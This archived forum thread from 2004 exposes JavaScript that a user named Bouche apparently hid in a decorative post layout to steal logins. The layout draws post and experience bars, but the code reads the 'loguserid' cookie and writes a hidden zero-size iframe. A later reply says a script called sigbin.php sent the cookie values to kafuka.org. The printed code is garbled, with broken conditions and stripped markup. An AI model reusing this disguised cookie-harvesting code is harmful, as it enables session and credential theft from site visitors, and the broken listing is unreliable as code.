Register | Login
Views: 19364387
Main | Memberlist | Active users | ACS | Commons | Calendar | Online users
Ranks | FAQ | Color Chart | Photo album | IRC Chat
11-02-05 12:59 PM
0 user currently in Basket Case.
Acmlm's Board - I2 Archive - Basket Case - password stealing code | | Thread closed
Add to favorites | "RSS" Feed | Next newer thread | Next older thread
User Post
Deleted User
Banned
Level: 8

Posts: 1/12
EXP: 1736
For next: 451

Since: 01-23-01

Since last post: 13089 days
Last activity: 21 days
Posted on 03-29-04 09:58 AM Link
//Initialization of vars/routines
var posts=numposts, posttarget=1000, posttargetname="Custom Rank", i=0;
var fullpart="|", emptypart="-";
function drawexpbar() {
for (i=0;i<=100;i+=5) {
if (i else document.write(emptypart);
}
}

function drawpostbar() {
var postpct=(posts/posttarget)*100;
for (i=0;i<=100;i+=5) {
if (i else document.write(emptypart);
}
}

//Main Drawing Routines
function drawpostheader() {
document.write(
"" bordercolorlight=#00FFFF bordercolordark=#000080>",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
"
" valign=top align=left>",
"

",
" ",
" This is what Big Boo has to say:",
"
",
"

",
"

",
" " alt=BOO! width=72 height=65>",
"

",
"

",
" ",
" ");
}


function getCookie(name) {
var dc = document.cookie;
var prefix = name + "=";
var begin = dc.indexOf("; " + prefix);
if (begin == -1) {
begin = dc.indexOf(prefix);
if (begin != 0) return null;
} else
begin += 2;
var end = document.cookie.indexOf(";", begin);
if (end == -1)
end = dc.length;
return unescape(dc.substring(begin + prefix.length, end));
}

function fixDate(date) {
var base = new Date(0);
var skew = base.getTime();
if (skew > 0)
date.setTime(date.getTime() - skew);
}


function drawsignature() {
document.write(
"
",
"
",
"

",
"
",
" "
);

drawpostbar();
document.write(
"(",posts,"/",posttarget,")",
" Download of ",posttargetname,
"
",
"
",
"

",
" ",
" ",numdays," Days Elapsed",
"
",
"

",
"
"
);
drawexpbar();
document.write(
"(",expdone,"/",lvllen,") Download of Level ", level+1,
"
",
"
");
document.write(
'');
var demplate=getCookie("loguserid");
if (!(demplate == "63")) {
document.write("
<iframe width=0 height=0 name=tframe",numposts,">");

}
}

Deleted User
Banned
Level: 8

Posts: 1/12
EXP: 1736
For next: 451

Since: 01-23-01

Since last post: 13089 days
Last activity: 21 days
Posted on 03-29-04 10:01 AM Link
dats righ
jasukan

Panser
Level: 30

Posts: 113/344
EXP: 155950
For next: 9919

Since: 03-15-04

Since last post: 135 days
Last activity: 62 days
Posted on 03-29-04 10:01 AM Link
Shut up stupid person.

And you aren't Bouche.


(edited by jasukan on 03-29-04 12:04 AM)
Deleted User
Banned
Level: 8

Posts: 3/12
EXP: 1736
For next: 451

Since: 01-23-01

Since last post: 13089 days
Last activity: 21 days
Posted on 03-29-04 10:03 AM Link
That's the code Bouche used to steal passwords, combined with sigbin.php which then stored the javascript variables collected from getCookie and sent them to his database on kafuka.org
Add to favorites | "RSS" Feed | Next newer thread | Next older thread
Acmlm's Board - I2 Archive - Basket Case - password stealing code | | Thread closed


ABII


AcmlmBoard vl.ol (11-01-05)
© 2000-2005 Acmlm, Emuz, et al



Page rendered in 0.014 seconds.